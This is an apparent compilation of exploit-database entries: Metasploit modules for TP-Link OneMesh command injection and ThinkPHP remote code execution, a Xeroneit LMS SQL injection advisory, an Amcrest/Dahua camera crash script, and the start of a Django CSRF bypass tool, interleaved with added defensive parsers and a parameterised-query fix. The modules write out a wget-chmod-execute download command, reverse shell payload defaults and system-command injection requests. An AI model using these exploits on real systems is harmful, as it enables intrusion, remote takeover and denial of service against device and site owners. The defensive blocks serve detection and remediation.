  def exploit
    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
      fail_with(Failure::Unreachable, "#{peer} - Please specify the LAN IP address of this computer in SRVHOST")
    end

    if datastore['SSL']
      fail_with(Failure::Unknown, "SSL is not supported on this target, please disable it")
    end

    print_status("Attempting to exploit #{target.name}")

    tpdp_packet_template =
      [0x01].pack('C*') +       # packet version, fixed to 1
      [0xf0].pack('C*') +       # set packet type to 0xf0 (onemesh)
      [0x07].pack('S>*') +      # onemesh opcode, used by the onemesh_main switch table
      [0x00].pack('S>*') +      # packet len
      [0x01].pack('C*') +       # some flag, has to be 1 to enter the vulnerable onemesh function
      [0x00].pack('C*') +       # dunno what this is
      [rand(0xff),rand(0xff),rand(0xff),rand(0xff)].pack('C*') +  # serial number, can be any value
      [0x5A,0x6B,0x7C,0x8D].pack('C*')        # Checksum placeholder

    srv_host = datastore['SRVHOST']
    srv_port = datastore['SRVPORT']
    @cmd_file = rand_text_alpha_lower(1)

    # generate our payload executable
    @payload_exe = generate_payload_exe

    # Command that will download @payload_exe and execute it
    download_cmd = "wget http://#{srv_host}:#{srv_port}/#{@cmd_file};chmod +x #{@cmd_file};./#{@cmd_file}"

    http_service = 'http://' + srv_host + ':' + srv_port.to_s
    print_status("Starting up our web service on #{http_service} ...")
    start_service({'Uri' => {
      'Proc' => Proc.new { |cli, req|
        on_request_uri(cli, req)
      },
      'Path' => "/#{@cmd_file}"
    }})

    print_status("#{peer} - Connecting to the target")
    connect_udp

    print_status("#{peer} - Sending command file byte by byte")
    print_status("#{peer} - Command: #{download_cmd}")
    mod = download_cmd.length / 5

    download_cmd.each_char.with_index { |c, index|
      # Generate payload
      payload = create_injection(c)
      if not payload
        fail_with(Failure::Unknown, "#{peer} - Failed to setup download command!")
      end

      # Encrypt payload
      ciphertext = aes_encrypt(payload)
      if not ciphertext
        fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!")
      end

      tpdp_packet = tpdp_packet_template.dup
      tpdp_packet += ciphertext
      tpdp_packet = update_len_field(tpdp_packet, ciphertext.length)
      tpdp_packet = calc_checksum(tpdp_packet.bytes)

      udp_sock.put(tpdp_packet)

      # Sleep to make sure the payload is processed by a target
      Rex.sleep(1)

      # Print progress
      if ((index+1) % mod == 0)
        percentage = 20 * ((index+1) / mod)
        # very advanced mathematics in use here to show the progress bar
        print_status("#{peer} - [0%]=#{' =' * ((percentage*2/10-1)-1)}>#{' -'*(20-(percentage*2/10))}[100%]")
        if percentage == 100
          # a bit of cheating to get the last char done right
          index = -2
        end
        #print_status("#{peer} - #{download_cmd[0..index+1]}#{'-' * (download_cmd[index+1..-1].length-1)}")
      end
    }

    # Send the exec command. From here we should receive the connection
    print_status("#{peer} - Command file sent, attempting to execute...")
    tpdp_packet = exec_cmd_file(tpdp_packet_template.dup)
    udp_sock.put(tpdp_packet)

    timeout = 0
    while not @payload_sent
      Rex.sleep(1)
      timeout += 1
      if timeout == datastore['MAX_WAIT'].to_i
        fail_with(Failure::Unknown, "#{peer} - Timeout reached! Payload was not downloaded :(")
      end
    end

    disconnect_udp
  end
end
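The packet layout in tpdp_packet_template and the CRC loop in calc_checksum are the two pieces a network defender needs to recognise and validate TDP traffic on UDP/20002. The block below is an added example written for this page; it is not part of the Metasploit module. It regenerates the module's 1024-byte reference table from the reflected CRC-32 polynomial 0xEDB88320 (the table's first entries, 0x00000000 and 0x77073096, are the standard CRC-32 table, so the module's checksum is ordinary CRC-32 with the `~res` complement), parses the 16-byte header in the module's field order, and verifies a packet the way the module builds it: the CRC is computed while the placeholder bytes 5A 6B 7C 8D occupy the checksum field. Function names, the problem codes, and the sample packet are mine; the body bytes stand in for the AES ciphertext and are constructed, not captured.

```python
import struct
import zlib

TDP_HEADER_LEN = 16
TDP_VERSION = 0x01
TDP_TYPE_ONEMESH = 0xF0
# calc_checksum() in the module runs its CRC over the packet while these four
# bytes sit in the checksum field, then overwrites the field with the result.
CHECKSUM_PLACEHOLDER = b"\x5a\x6b\x7c\x8d"


def _crc32_table():
    # Regenerate the 256-entry table the module embeds (reflected polynomial 0xEDB88320).
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        table.append(c)
    return table


_TABLE = _crc32_table()


def tdp_checksum(data):
    """The loop from calc_checksum(): res starts at 0xffffffff, each byte indexes the
    table with (byte ^ res) & 0xff, and the result is the 32-bit complement of res."""
    res = 0xFFFFFFFF
    for b in data:
        res = _TABLE[(b ^ res) & 0xFF] ^ (res >> 8)
    return (~res) & 0xFFFFFFFF


def matches_zlib_crc32(data):
    """True when the table-driven loop agrees with the standard CRC-32 (it does)."""
    return tdp_checksum(data) == (zlib.crc32(data) & 0xFFFFFFFF)


def parse_tdp_header(packet):
    """Fields exactly as tpdp_packet_template lays them out, all big endian:
    version, type, opcode, length, flag, reserved byte, 4-byte serial, 4-byte checksum."""
    if len(packet) < TDP_HEADER_LEN:
        raise ValueError("packet shorter than the 16-byte TDP header")
    version, ptype, opcode, length, flag, reserved = struct.unpack_from(">BBHHBB", packet, 0)
    return {
        "version": version, "type": ptype, "opcode": opcode, "length": length,
        "flag": flag, "reserved": reserved, "serial": packet[8:12],
        "checksum": struct.unpack_from(">I", packet, 12)[0],
    }


def verify_tdp_packet(packet):
    """Return a list of problem codes; an empty list means the packet is internally consistent."""
    hdr = parse_tdp_header(packet)
    body = packet[TDP_HEADER_LEN:]
    problems = []
    if hdr["version"] != TDP_VERSION:
        problems.append("bad-version")
    if hdr["length"] != len(body):
        problems.append("length-mismatch")
    if hdr["type"] == TDP_TYPE_ONEMESH and len(body) % 16 != 0:
        problems.append("unaligned-onemesh-body")  # onemesh bodies are whole AES-128-CBC blocks
    # Recompute over the packet with the placeholder restored, as the sender computed it.
    expected = tdp_checksum(packet[:12] + CHECKSUM_PLACEHOLDER + body)
    if expected != hdr["checksum"]:
        problems.append("bad-checksum")
    return problems


def build_tdp_packet(opcode, body, serial=b"\x00\x01\x02\x03", ptype=TDP_TYPE_ONEMESH):
    """Constructed sample packet in the module's layout; `body` stands in for ciphertext."""
    header = struct.pack(">BBHHBB", TDP_VERSION, ptype, opcode, len(body), 1, 0)
    header += serial + CHECKSUM_PLACEHOLDER
    checksum = tdp_checksum(header + body)
    return header[:12] + struct.pack(">I", checksum) + body


if __name__ == "__main__":
    sample = build_tdp_packet(7, b"\x41" * 32)
    print(parse_tdp_header(sample), verify_tdp_packet(sample))
```

A sensor that only keeps the header fields and these verdicts already separates well-formed OneMesh packets (type 0xf0, opcode 7, flag 1, 16-byte-aligned body) from noise; inspecting the body itself would additionally require the fixed key and IV the module uses.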
            
# Exploit Title: Xeroneit Library Management System 3.0 - 'category' SQL Injection
# Google Dork: "LMS v3.0 - Xerone IT "
# Date: 2020-04-09
# Exploit Author: Sohel Yousef jellyfish security team
# Software Link: https://xeroneit.net/portfolio/library-management-system-lms
# Software Demo: https://xeroneit.co/demo/lms/home/login
# Version: v3.0
# Category: webapps

1. Description
The script has an SQL injection in the books category page, at this path:

/lms/home/book?category_name=00*SQLI

Error Number: 1064

You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near '0' GROUP BY
`title`, `author`, `edition` ORDER BY `title` ASC LIMIT 21' at line 3

SELECT sum(cast(cast(book_info.status as char) as SIGNED)) as
available_book, `book_info`.`number_of_books`, `book_info`.`id`,
`book_info`.`category_id`, `book_info`.`title`, `book_info`.`size1` as
`size`, `book_info`.`publishing_year`, `book_info`.`publisher`,
`book_info`.`edition_year`, `book_info`.`subtitle`, `book_info`.`edition`,
`book_info`.`isbn`, `book_info`.`author`, `book_info`.`cover`,
`book_info`.`add_date` FROM `book_info` WHERE FIND_IN_SET('57'',
category_id) !=0 AND `book_info`.`deleted` = '0' GROUP BY `title`,
`author`, `edition` ORDER BY `title` ASC LIMIT 21

Filename: models/Basic.php

Line Number: 284
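The error output shows the root cause: the `category_name` request value is spliced straight into the SQL text, so a single quote ends the literal inside FIND_IN_SET and the rest of the statement no longer parses (the 1064 error near `'0' GROUP BY ...`). The block below is an added example, not code from the Xeroneit product: it reproduces the vulnerable pattern and its parameterised fix in SQLite, registering a FIND_IN_SET function with MySQL's semantics so the advisory's WHERE clause runs unchanged. The table contents are constructed sample data shaped like the columns named in the error.

```python
import sqlite3


def find_in_set(needle, haystack):
    """MySQL FIND_IN_SET(): 1-based position of needle in a comma-separated list, 0 if absent.
    Registered below as a SQLite function so the advisory's query runs as written."""
    if needle is None or haystack is None:
        return None
    parts = str(haystack).split(",")
    return parts.index(str(needle)) + 1 if str(needle) in parts else 0


def make_db():
    # Constructed sample rows; only the columns the error output names are modelled.
    conn = sqlite3.connect(":memory:")
    conn.create_function("FIND_IN_SET", 2, find_in_set)
    conn.execute("CREATE TABLE book_info (id INTEGER, title TEXT, author TEXT, edition TEXT,"
                 " category_id TEXT, deleted TEXT)")
    conn.executemany("INSERT INTO book_info VALUES (?, ?, ?, ?, ?, ?)", [
        (1, "Compilers", "Aho", "2", "57", "0"),
        (2, "Networks", "Tanenbaum", "5", "12,57", "0"),
        (3, "Networks (withdrawn)", "Tanenbaum", "4", "57", "1"),
        (4, "Poetry", "Anon", "1", "3", "0"),
    ])
    return conn


# Same shape as the statement in the error output; {placeholder} is the category value.
_FILTER = ("FROM book_info WHERE FIND_IN_SET({placeholder}, category_id) != 0 "
           "AND deleted = '0' GROUP BY title, author, edition ORDER BY title ASC LIMIT 21")


def books_by_category_unsafe(conn, category_name):
    """The vulnerable pattern: the request parameter becomes part of the SQL text."""
    sql = "SELECT title " + _FILTER.format(placeholder="'" + category_name + "'")
    return [row[0] for row in conn.execute(sql)]


def books_by_category_safe(conn, category_name):
    """The fix: the value is bound as a parameter and is never parsed as SQL."""
    sql = "SELECT title " + _FILTER.format(placeholder="?")
    return [row[0] for row in conn.execute(sql, (category_name,))]


def query_breaks(conn, category_name):
    """True when the unsafe query fails to parse for this input (the 1064 condition)."""
    try:
        books_by_category_unsafe(conn, category_name)
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(books_by_category_safe(db, "57"))      # ['Compilers', 'Networks']
    print(books_by_category_safe(db, "57'"))     # [] : the quote is just data
    print(query_breaks(db, "57'"))               # True : the concatenated query is unparseable
```

With the bound parameter the quote is compared as data, so the injected input simply matches nothing; in CodeIgniter the equivalent is passing the value through the query builder or as a `?` binding rather than interpolating it into the statement string.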
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'                    => 'ThinkPHP Multiple PHP Injection RCEs',
      'Description'             => %q{
        This module exploits one of two PHP injection vulnerabilities in the
        ThinkPHP web framework to execute code as the web user.

        Versions up to and including 5.0.23 are exploitable, though 5.0.23 is
        vulnerable to a separate vulnerability. The module will automatically
        attempt to detect the version of the software.

        Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub.
      },
      'Author'                  => [
        # Discovery by unknown threaty threat actors
        'wvu' # Module
      ],
      'References'              => [
        # https://www.google.com/search?q=thinkphp+rce, tbh
        ['CVE', '2018-20062'], # NoneCMS 1.3 using ThinkPHP
        ['CVE', '2019-9082'],  # Open Source BMS 1.1.1 using ThinkPHP
        ['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce'],
        ['URL', 'https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce']
      ],
      'DisclosureDate'          => '2018-12-10', # Unknown discovery date
      'License'                 => MSF_LICENSE,
      'Platform'                => ['unix', 'linux'],
      'Arch'                    => [ARCH_CMD, ARCH_X86, ARCH_X64],
      'Privileged'              => false,
      'Targets'                 => [
        ['Unix Command',
          'Platform'            => 'unix',
          'Arch'                => ARCH_CMD,
          'Type'                => :unix_cmd,
          'DefaultOptions'      => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}
        ],
        ['Linux Dropper',
          'Platform'            => 'linux',
          'Arch'                => [ARCH_X86, ARCH_X64],
          'Type'                => :linux_dropper,
          'DefaultOptions'      => {
            'CMDSTAGER::FLAVOR' => :curl,
            'PAYLOAD'           => 'linux/x64/meterpreter/reverse_tcp'
          }
        ]
      ],
      'DefaultTarget'           => 1,
      'Notes'                   => {
        'Stability'             => [CRASH_SAFE],
        'Reliability'           => [REPEATABLE_SESSION],
        'SideEffects'           => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
      }
    ))

    register_options([
      Opt::RPORT(8080),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])

    register_advanced_options([
      # NOTE: You may want to tweak this for long-running commands like find(1)
      OptFloat.new('CmdOutputTimeout',
                   [true, 'Timeout for cmd/unix/generic output', 3.5])
    ])

    # XXX: https://github.com/rapid7/metasploit-framework/issues/12963
    import_target_defaults
  end

=begin
  wvu@kharak:~$ curl -vs "http://127.0.0.1:8080/index.php?s=$((RANDOM))" | xmllint --html --xpath 'substring-after(//div[@class = "copyright"]/span[1]/text(), "V")' -
  *   Trying 127.0.0.1...
  * TCP_NODELAY set
  * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  > GET /index.php?s=1353 HTTP/1.1
  > Host: 127.0.0.1:8080
  > User-Agent: curl/7.54.0
  > Accept: */*
  >
  < HTTP/1.1 404 Not Found
  < Date: Mon, 13 Apr 2020 06:42:15 GMT
  < Server: Apache/2.4.25 (Debian)
  < X-Powered-By: PHP/7.2.5
  < Content-Length: 7332
  < Content-Type: text/html; charset=utf-8
  <
  { [7332 bytes data]
  * Connection #0 to host 127.0.0.1 left intact
  5.0.20wvu@kharak:~$
=end
  def check
    # An unknown route will trigger the ThinkPHP copyright with version
    res = send_request_cgi(
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'index.php'),
      'vars_get' => {'s' => rand_text_alpha(8..42)}
    )

    unless res
      return CheckCode::Unknown('Target did not respond to check request.')
    end

    unless res.code == 404 && res.body.match(/copyright.*ThinkPHP/m)
      return CheckCode::Unknown(
        'Target did not respond with ThinkPHP copyright.'
      )
    end

    # Get the first copyright <span> containing the version (nil when the span is absent)
    version = res.get_html_document.at('//div[@class = "copyright"]/span')&.text

    unless version && (version = version.scan(/^V([\d.]+)$/).flatten.first)
      return CheckCode::Detected(
        'Target did not respond with ThinkPHP version.'
      )
    end

    # Make the parsed version a comparable ivar for automatic exploitation
    @version = Gem::Version.new(version)

    if @version <= Gem::Version.new('5.0.23')
      return CheckCode::Appears("ThinkPHP #{@version} is a vulnerable version.")
    end

    CheckCode::Safe("ThinkPHP #{@version} is NOT a vulnerable version.")
  end

  def exploit
    # NOTE: Automatic check is implemented by the AutoCheck mixin
    super

    # This is just extra insurance in case I screwed up the check method
    unless @version
      fail_with(Failure::NoTarget, 'Could not detect ThinkPHP version')
    end

    print_status("Targeting ThinkPHP #{@version} automatically")

    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      # XXX: Only opts[:noconcat] may induce responses from the server
      execute_cmdstager
    else # This is just extra insurance in case I screwed up the info hash
      fail_with(Failure::NoTarget, "Could not select target #{target['Type']}")
    end
  end

  def execute_command(cmd, _opts = {})
    vprint_status("Executing command: #{cmd}")

    if @version < Gem::Version.new('5.0.23')
      exploit_less_than_5_0_23(cmd)
    elsif @version == Gem::Version.new('5.0.23')
      exploit_5_0_23(cmd)
    else # This is just extra insurance in case I screwed up the exploit method
      fail_with(Failure::NoTarget, "Could not target ThinkPHP #{@version}")
    end
  end

=begin
  wvu@kharak:~$ curl -gvs "http://127.0.0.1:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id" | head -1
  *   Trying 127.0.0.1...
  * TCP_NODELAY set
  * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  > GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1
  > Host: 127.0.0.1:8080
  > User-Agent: curl/7.54.0
  > Accept: */*
  >
  < HTTP/1.1 200 OK
  < Date: Mon, 13 Apr 2020 06:43:45 GMT
  < Server: Apache/2.4.25 (Debian)
  < X-Powered-By: PHP/7.2.5
  < Vary: Accept-Encoding
  < Transfer-Encoding: chunked
  < Content-Type: text/html; charset=UTF-8
  <
  { [60 bytes data]
  * Connection #0 to host 127.0.0.1 left intact
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  wvu@kharak:~$
=end
  def exploit_less_than_5_0_23(cmd)
    # XXX: The server may block on executing our payload and won't respond
    res = send_request_cgi({
      'method'      => 'GET',
      'uri'         => normalize_uri(target_uri.path, 'index.php'),
      'vars_get'    => {
        's'         => '/Index/\\think\\app/invokefunction',
        'function'  => 'call_user_func_array',
        'vars[0]'   => 'system', # TODO: Debug ARCH_PHP
        'vars[1][]' => cmd
      },
      'partial'     => true
    }, datastore['CmdOutputTimeout'])

    return unless res && res.code == 200

    vprint_good("Successfully executed command: #{cmd}")

    return unless datastore['PAYLOAD'] == 'cmd/unix/generic'

    # HACK: Print half of the doubled-up command output
    vprint_line(res.body[0, res.body.length / 2])
  end

=begin
  wvu@kharak:~$ curl -vsd "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id" http://127.0.0.1:8081/index.php?s=captcha | head -1
  *   Trying 127.0.0.1...
  * TCP_NODELAY set
  * Connected to 127.0.0.1 (127.0.0.1) port 8081 (#0)
  > POST /index.php?s=captcha HTTP/1.1
  > Host: 127.0.0.1:8081
  > User-Agent: curl/7.54.0
  > Accept: */*
  > Content-Length: 72
  > Content-Type: application/x-www-form-urlencoded
  >
  } [72 bytes data]
  * upload completely sent off: 72 out of 72 bytes
  < HTTP/1.1 200 OK
  < Date: Mon, 13 Apr 2020 06:44:05 GMT
  < Server: Apache/2.4.25 (Debian)
  < X-Powered-By: PHP/7.2.12
  < Vary: Accept-Encoding
  < Transfer-Encoding: chunked
  < Content-Type: text/html; charset=UTF-8
  <
  { [60 bytes data]
  * Connection #0 to host 127.0.0.1 left intact
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  wvu@kharak:~$
=end
  def exploit_5_0_23(cmd)
    # XXX: The server may block on executing our payload and won't respond
    res = send_request_cgi({
      'method'                   => 'POST',
      'uri'                      => normalize_uri(target_uri.path, 'index.php'),
      'vars_get'                 => {'s' => 'captcha'},
      'vars_post'                => {
        '_method'                => '__construct',
        'filter[]'               => 'system', # TODO: Debug ARCH_PHP
        'method'                 => 'get',
        'server[REQUEST_METHOD]' => cmd
      },
      'partial'                  => true
    }, datastore['CmdOutputTimeout'])

    return unless res && res.code == 200

    vprint_good("Successfully executed command: #{cmd}")

    return unless datastore['PAYLOAD'] == 'cmd/unix/generic'

    # Clean up output from cmd/unix/generic
    vprint_line(res.body.gsub(/\n<!DOCTYPE html>.*/m, ''))
  end

end
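The two curl transcripts above give the exact request shapes a defender can key on: for versions below 5.0.23 the `s=` route names a framework class (`\think\app/invokefunction`), and for 5.0.23 the POST to `s=captcha` overrides the request method with `_method=__construct` and supplies `filter[]` and `server[...]` fields. The block below is an added example, not part of the Metasploit module, that scores individual requests on those indicators as a reverse proxy or WAF would see them. The indicator codes, function names and the sample requests are mine; the samples are constructed to mirror the transcripts.

```python
from urllib.parse import urlsplit, parse_qs


def _params(encoded):
    # Decode application/x-www-form-urlencoded data into {name: [values]}, keeping empties.
    return parse_qs(encoded, keep_blank_values=True)


def thinkphp_rce_indicators(method, uri, body=""):
    """Return indicator codes for one HTTP request (method, path+query, raw form body)."""
    findings = []
    query = _params(urlsplit(uri).query)
    route = " ".join(query.get("s", [])).lower()

    # Pre-5.0.23 pattern: the s= route reaches into the framework namespace and
    # asks for a method to be invoked; normal routes look like /index/index/hello.
    if "\\think\\" in route or "invokefunction" in route:
        findings.append("route-names-internal-class")

    # 5.0.23 pattern: form fields turn the request into a constructor call whose
    # filter callback is applied to attacker-supplied server variables.
    if method.upper() == "POST":
        form = _params(body)
        if "__construct" in form.get("_method", []):
            findings.append("method-override-construct")
            if any(name.startswith("filter") for name in form):
                findings.append("filter-callback-injection")
            if any(name.startswith("server[") for name in form):
                findings.append("server-var-override")
    return findings


# Constructed sample requests, in the order a body-logging proxy would record them.
SAMPLE_REQUESTS = [
    ("GET", "/index.php?s=/index/index/hello&name=World", ""),
    ("GET", "/index.php?s=/Index/%5Cthink%5Capp/invokefunction&function=call_user_func_array"
            "&vars[0]=system&vars[1][]=id", ""),
    ("POST", "/index.php?s=captcha", "code=ab12"),
    ("POST", "/index.php?s=captcha",
     "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id"),
]


def flagged_requests(requests=SAMPLE_REQUESTS):
    """Map request index -> indicator codes for every request that raised at least one."""
    result = {}
    for index, (method, uri, body) in enumerate(requests):
        found = thinkphp_rce_indicators(method, uri, body)
        if found:
            result[index] = found
    return result


if __name__ == "__main__":
    for index, codes in flagged_requests().items():
        print(index, SAMPLE_REQUESTS[index][0], SAMPLE_REQUESTS[index][1], codes)
```

Only the GET variant is visible in an ordinary access log, since the query string is logged and the body is not; the `s=captcha` POST looks like a normal captcha check there, so catching the 5.0.23 form needs a proxy or WAF that inspects request bodies. The version string the `check` method reads from the copyright `<span>` is a cheap way to decide whether either pattern matters for a given host.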
            
# Exploit Title: Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)
# Date: 2020-04-07
# Exploit Author: Jacob Baines
# Vendor Homepage: https://amcrest.com/
# Software Link: https://amcrest.com/firmwaredownloads
# Version: Many different versions due to number of Dahua/Amcrest/etc devices affected
# Tested on: Amcrest IP2M-841 2.420.AC00.18.R and AMDVTENL8-H5 4.000.00AC000.0
# CVE : CVE-2020-5735
# Advisory: https://www.tenable.com/security/research/tra-2020-20
# Amcrest & Dahua NVR/Camera Port 37777 Authenticated Crash

import argparse
import hashlib
import socket
import struct
import sys
import md5
import re

## DDNS test functionality. Stack overflow via memcpy

def recv_response(sock):
    # minimum size is 32 bytes
    header = sock.recv(32)

    # check we received enough data
    if len(header) != 32:
        print 'Invalid response. Too short'
        return (False, '', '')

    # extract the payload length field
    length_field = header[4:8]
    payload_length = struct.unpack_from('I', length_field)
    payload_length = payload_length[0]

    # uhm... lets be restrictive of accepted lengths
    if payload_length < 0 or payload_length > 4096:
        print 'Invalid response. Bad payload length'
        return (False, header, '')

    if (payload_length == 0):
        return (True, header, '')

    payload = sock.recv(payload_length)
    if len(payload) != payload_length:
        print 'Invalid response. Bad received length'
        return (False, header, payload)

    return (True, header, payload)

def sofia_hash(msg):
    h = ""
    m = hashlib.md5()
    m.update(msg)
    msg_md5 = m.digest()
    for i in range(8):
        n = (ord(msg_md5[2*i]) + ord(msg_md5[2*i+1])) % 0x3e
        if n > 9:
            if n > 35:
                n += 61
            else:
                n += 55
        else:
            n += 0x30
        h += chr(n)
    return h

top_parser = argparse.ArgumentParser(description='lol')
top_parser.add_argument('-i', '--ip', action="store", dest="ip",
                        required=True, help="The IPv4 address to connect to")
top_parser.add_argument('-p', '--port', action="store", dest="port",
                        type=int, help="The port to connect to", default="37777")
top_parser.add_argument('-u', '--username', action="store",
                        dest="username", help="The user to login as", default="admin")
top_parser.add_argument('--pass', action="store", dest="password",
                        required=True, help="The password to use")
args = top_parser.parse_args()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Attempting connection to " + args.ip + ":" + str(args.port)
sock.connect((args.ip, args.port))
print "[+] Connected!"

# send the old style login request. We'll use blank hashes. This should
# trigger a challenge from new versions of the camera
old_login = ("\xa0\x05\x00\x60\x00\x00\x00\x00" +
             "\x00\x00\x00\x00\x00\x00\x00\x00" + # username hash
             "\x00\x00\x00\x00\x00\x00\x00\x00" + # password hash
             "\x05\x02\x00\x01\x00\x00\xa1\xaa")
sock.sendall(old_login)
(success, header, challenge) = recv_response(sock)
if success == False or not challenge:
    print 'Failed to receive the challenge'
    print challenge
    sys.exit(0)

# extract the realm and random seed
seeds = re.search("Realm:(Login to [A-Za-z0-9]+)\r\nRandom:([0-9]+)\r\n",
                  challenge)
if seeds == None:
    print 'Failed to extract realm and random seed.'
    print challenge
    sys.exit(0)

realm = seeds.group(1)
random = seeds.group(2)

# compute the response
realm_hash = md5.new(args.username + ":" + realm + ":" +
                     args.password).hexdigest().upper()
random_hash = md5.new(args.username + ":" + random + ":" +
                      realm_hash).hexdigest().upper()
sofia_result = sofia_hash(args.password)
final_hash = md5.new(args.username + ":" + random + ":" +
                     sofia_result).hexdigest().upper()

challenge_resp = ("\xa0\x05\x00\x60\x47\x00\x00\x00" +
                  "\x00\x00\x00\x00\x00\x00\x00\x00" +
                  "\x00\x00\x00\x00\x00\x00\x00\x00" +
                  "\x05\x02\x00\x08\x00\x00\xa1\xaa" +
                  args.username + "&&" + random_hash + final_hash)
sock.sendall(challenge_resp)

(success, header, payload) = recv_response(sock)
if success == False or not header:
    print 'Failed to receive the session id'
    sys.exit(0)

session_id_bin = header[16:20]
session_id_int = struct.unpack_from('I', session_id_bin)
if session_id_int[0] == 0:
    print "Log in failed."
    sys.exit(0)

session_id = session_id_int[0]
print "[+] Session ID: " + str(session_id)

# firmware version
command = "Protocol: " + ("a" * 0x300) + "\r\n"
command_length = struct.pack("I", len(command))
firmware = ("\x62\x00\x00\x00" + command_length +
            "\x04\x00\x00\x00\x00\x00\x00\x00" +
            "\x00\x00\x00\x00\x00\x00\x00\x00" +
            "\x00\x00\x00\x00\x00\x00\x00\x00" +
            command)
sock.sendall(firmware)
(success, header, firmware_string) = recv_response(sock)
if success == False and not header:
    print "[!] Probably crashed the server."
else:
    print "[+] Attack failed."
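
The script above ends by sending a 0x62 request whose body carries a "Protocol:" header of 0x300 bytes and watching whether the camera stops answering. From the defender's side, the framing the script itself uses (a 32-byte header with the message type in byte 0, the little-endian body length at offset 4 and the session id at offset 16, as its struct calls lay it out) is enough to flag such a request on the wire. The parser below is an added example, not part of the listing; the header layout is taken from the listing's own code, while the 256-byte field threshold and the helper names (build_frame, parse_frame, text_fields, suspicious) are my own.

```python
import struct

HEADER_LEN = 32        # every request in the listing is a 32-byte header followed by a body
MAX_FIELD_LEN = 256    # constructed threshold: longer "Key: value" fields are flagged


def build_frame(msg_type: int, body: bytes, session_id: int = 0) -> bytes:
    """Constructed helper laying out the header the way the listing's struct calls do:
    byte 0 message type, uint32 LE body length at offset 4, uint32 LE session id at 16."""
    header = bytearray(HEADER_LEN)
    header[0] = msg_type
    struct.pack_into("<I", header, 4, len(body))
    struct.pack_into("<I", header, 16, session_id)
    return bytes(header) + body


def parse_frame(frame: bytes) -> dict:
    """Split one frame into its header fields and body; raises on a truncated header."""
    if len(frame) < HEADER_LEN:
        raise ValueError("frame shorter than the 32-byte header")
    return {
        "type": frame[0],
        "declared_len": struct.unpack_from("<I", frame, 4)[0],
        "session_id": struct.unpack_from("<I", frame, 16)[0],
        "body": frame[HEADER_LEN:],
    }


def text_fields(body: bytes) -> dict:
    """Split a 'Key: value\\r\\n' body (the Protocol:, Realm: and Random: lines) into a dict."""
    fields = {}
    for line in body.split(b"\r\n"):
        key, sep, value = line.partition(b":")
        if sep:
            fields[key.strip().decode("ascii", "replace")] = value.strip()
    return fields


def suspicious(frame: bytes) -> list:
    """Reasons a frame looks malformed or like an overlong-field probe; empty when benign."""
    reasons = []
    info = parse_frame(frame)
    if info["declared_len"] != len(info["body"]):
        reasons.append(f"declared length {info['declared_len']} != body length {len(info['body'])}")
    for key, value in text_fields(info["body"]).items():
        if len(value) > MAX_FIELD_LEN:
            reasons.append(f"{key} field is {len(value)} bytes (limit {MAX_FIELD_LEN})")
    return reasons
```

Run over a capture of port 37777 traffic, the length check catches truncated or mis-framed requests and the field check catches the oversized "Protocol:" value the listing sends; a benign request with short fields produces no reasons.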
            
# Exploit Title: Django 3.0 - Cross-Site Request Forgery Token Bypass
# Date: 2020-04-08
# Exploit Author: Spad Security Group
# Vendor Homepage: https://www.djangoproject.com/
# Software Link: https://pypi.org/project/Django/
# Version: 3.0 =<
# Tested on: windows 10
# Language: python3.8

# t.me/SpadSec
# Spad Security Group


from requests import Session
import sys
from bs4 import BeautifulSoup
from time import sleep
from colorama import Fore, Style
from random import choice
from os import name, system

colors = [Fore.RED, Fore.BLUE, Fore.WHITE, Fore.GREEN, Fore.CYAN, Fore.YELLOW]


def cleaner():
    if name == "nt":
        system("cls")
    else:
        system("clear")

def logo_printer():
    cleaner()
    logo = r"""
     \_______/
 `.,-'\_____/`-.,'
  /`..'\ _ /`.,'\
 /  /`.,' `.,'\  \
/__/__/     \__\__\__
\  \  \     /  /  /
 \  \,'`._,'`./  /
  \,'`./___\,'`./
 ,'`-./_____\,-'`.
     /       \
    """
    _logo_enumer = 0
    for char in logo:
        sys.stdout.write(f"{choice(colors)}{char}{Style.RESET_ALL}")
        sys.stdout.flush()
        _logo_enumer +=1
        sleep(0.005)
    print(f"{colors[4]}DjangoCsrfMiddlewareToken bypass by SpadSecurity Group \n{colors[3]}\tt.me/SpadSec")

class DjangoCsrfMiddleWareBypass:
    def __init__(self, url: str, username: str, password: str):
        self.url = url
        self.username = username
        self.password = password
        logo_printer()
        self.cookies = {}
        self.session = Session()
        self.bypass()
    
    def spad_printer(self, string):
        print("\n")
        for char in string:
            sys.stdout.write(char)
            sys.stdout.flush()
            sleep(0.05)

    def bypass(self):
        global colors
        _conn = self.session.get(self.url)
        self.spad_printer(f"{colors[5]}[{colors[0]}x{colors[5]}] {colors[4]}Target: {colors[3]}{self.url}")
